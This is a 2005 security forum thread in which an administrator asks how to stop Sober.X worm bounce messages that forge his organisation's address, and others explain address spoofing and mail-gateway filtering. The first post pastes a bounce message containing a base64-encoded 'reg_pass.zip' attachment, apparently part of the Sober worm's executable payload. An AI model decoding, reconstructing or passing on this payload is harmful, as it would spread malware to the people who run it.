Sober Issue
Results 1 to 8 of 8

Thread: Sober Issue

  1. #1
    Junior Member
    Join Date
    Dec 2005
    Posts
    10

    Question Sober Issue

    Hi there!
    Well, I thought for my first post I would ask some of you more knowledgable folk for some assistance.

    Anyway, the Sober worm is pounding our mail servers insanely. Luckily 99.9% of the mail is being stopped, which is awesome! The issue resides with that last 0.1%.

    One of our users has info@ourdomain.com as an alias, for various reasons. For some reason, he continually gets rejected and bounced emails, all relating to the Sober.X worm. Observe:

    Code:
    -----Original Message-----
    From: Mail Error Handler [mailto:MAILER-DAEMON@ibuyhouses.com]
    Sent: Saturday, December 17, 2005 3:13 AM
    To: info
    Subject: Undeliverable Mail Returned to Sender
    
    *** This message was automatically generated by the MailMax Error Responder ***
    
    Sorry, your message from <info@ourdomain.com> to <mike.ochsner@gmail.com> could not be delivered. The specific error is:
    
      552 5.7.0 Illegal Attachment i38si6000307wxd
    
    
    This is permanent error, and the message will not be retried any further.
    
    === The Original Message Follows ===
    
    Received: from [151.199.126.160] by ibuyhouses.com [192.168.1.100] with SmartMax MailMax for lexi-outbound@ibuyhouses.com; Sat, 17 Dec 2005 04:12:19 -0500
    Return-Path: <info@ourdomain.com>
    X-SmartMax-AuthUser: 
    From: info@ourdomain.com
    To: usbmis_news@ibuyhouses.com
    Date: Sat, 17 Dec 2005 08:53:18 GMT
    Subject: Registration Confirmation
    Importance: Normal
    X-Priority: 3 (Normal)
    Message-ID: <684b28de1669c6bbe@ourdomain.com>
    MIME-Version: 1.0
    Content-Type: multipart/mixed; boundary="=b80bafc1c.3a3348f3b"
    Content-Transfer-Encoding: 7bit
    
    
    
    --=b80bafc1c.3a3348f3b
    
    Account and Password Information are attached!
    --=b80bafc1c.3a3348f3b
    Content-Type: application/octet-stream; name=reg_pass.zip
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="reg_pass.zip"
    
    UEsDBAoAAAAAAACQdjPMyus3XtgAAF7YAAAYAAAARmlsZS1wYWNrZWRfZGF0YUluZm8uZXhlTVqQ
    AAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    yAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
    DQ0KJAAAAAAAAABd+8faGZqpiRmaqYkZmqmJmoaniRiaqYlwhaCJHJqpiQmFpIkYmqmJUmljaBma
    qYkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAOVIXUMAAAAAAAAAAOAADwELAQYAANAA
    AAAQAAAAQAIA0BkDAABQAgAAIAMAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAAAwAwAAEAAA
    AAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAEAiAwCcAAAAACADAEACAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAC
    AAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOAAAAAAAAAAAADQAAAAUAIAAMwAAAAEAAAAAAAA
    AAAAAAAAAABAAADgLnJzcmMAAAAAEAAAACADAAAEAAAA0AAAAAAAAAAAAAAAAAAAQAAAwAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    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
    
    
    === End Original Message ===
    
    *** This message was automatically generated by the MailMax Error Responder ***
    Now, "reg_pass.zip" is a Sober payload, that much I know. But from what I have read about Sober, it will forge the senders address. This is all well and good, but the forged address (if I am reading this correctly) is one of our legitimate addresses! I had set up some rules on the users email client to automatically trash these messages, but it appears some are continually getting through. Apparently he got 30 of these just this morning. Anyway, I've done a full scan of every box on our network, and none of them are infected. I probably didn't need to do this, because if someone was infected, we'd be seeing tons of these messages on everyone's computer.

    So I guess my question is, what can I do to stop this? I have no idea how this worm somewhere got one of our legitimate email addresses; it seems to me that the ibuyhouses.com guy has the info@ourdomain.com address stored in their client, and that he is infected? Am I right in assuming this? What the heck can I do?

  2. #2
    AO Senior Cow-beller
    Moderator
    zencoder's Avatar
    Join Date
    Dec 2004
    Location
    Mountain standard tribe.
    Posts
    1,177
    There is not one whit of anything you can do about your legitimate address being forged in messages sent from infected machines. The problem is akin to a person in Malaysia telling people he knows you personally and that you vouche for his product...assuming you DO live in the USA as your profile suggests, and you've never been to Malaysia, met this person, or had any interaction with him.

    You simply have to influence or control over that part of this problem.

    As for the incoming bounce replies...do you have a bridgehead type server, scanning all incoming messages? Are they getting by that server? If so, you need to look at the configuration and block/drop rules on that server. If not...well, all I can suggest is you look into one.

    Or you could look into a service provider to do it for your. Postino is a big player in this field. So is VeriSign. I'm sure there are many companies that would be happy to receive your email, and filter it before it hits your network...for a fee.
    "Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
    Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
    "...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    I have no idea how this worm somewhere got one of our legitimate email addresses; it seems to me that the ibuyhouses.com guy has the info@ourdomain.com address stored in their client, and that he is infected? Am I right in assuming this?
    actually it's more likely that both address were stored on a computer that became infected. virusses tend not to use the addresses of computers they infect in order to keep them infected. they take stored email addys and use one in the sender field and send to the rest
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  4. #4
    Junior Member
    Join Date
    Dec 2005
    Posts
    10
    See, I wouldn't think so. The headers look like someone that uses the ibuyhouses.com mail server attempted to send an email to that gmail account. Which to me says that both my user's address and the gmail address are stored on the aforementioned computer.

  5. #5
    Blast From the Past
    Join Date
    Jan 2003
    Posts
    729
    god what i would give to be sober... read my mood
    work it harder, make it better, do it faster, makes us stronger

  6. #6
    BIOS Bomber
    Join Date
    Jul 2003
    Location
    Michigan
    Posts
    357
    sorry to say but something like this wont do it heh find somthing stronger
    "When in doubt, use Brute Force."

    Never argue with an idiot. They'll drag you down to their level, then beat you with experience.

  7. #7
    Junior Member
    Join Date
    Dec 2005
    Posts
    10
    sorry to say but something like this wont do it heh find somthing stronger
    I have no idea what you are talking about.

  8. #8
    BIOS Bomber
    Join Date
    Jul 2003
    Location
    Michigan
    Posts
    357
    Originally posted here by hexadecimal
    god what i would give to be sober... read my mood
    thats what i was talking about...it was a joke calm down son
    "When in doubt, use Brute Force."

    Never argue with an idiot. They'll drag you down to their level, then beat you with experience.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •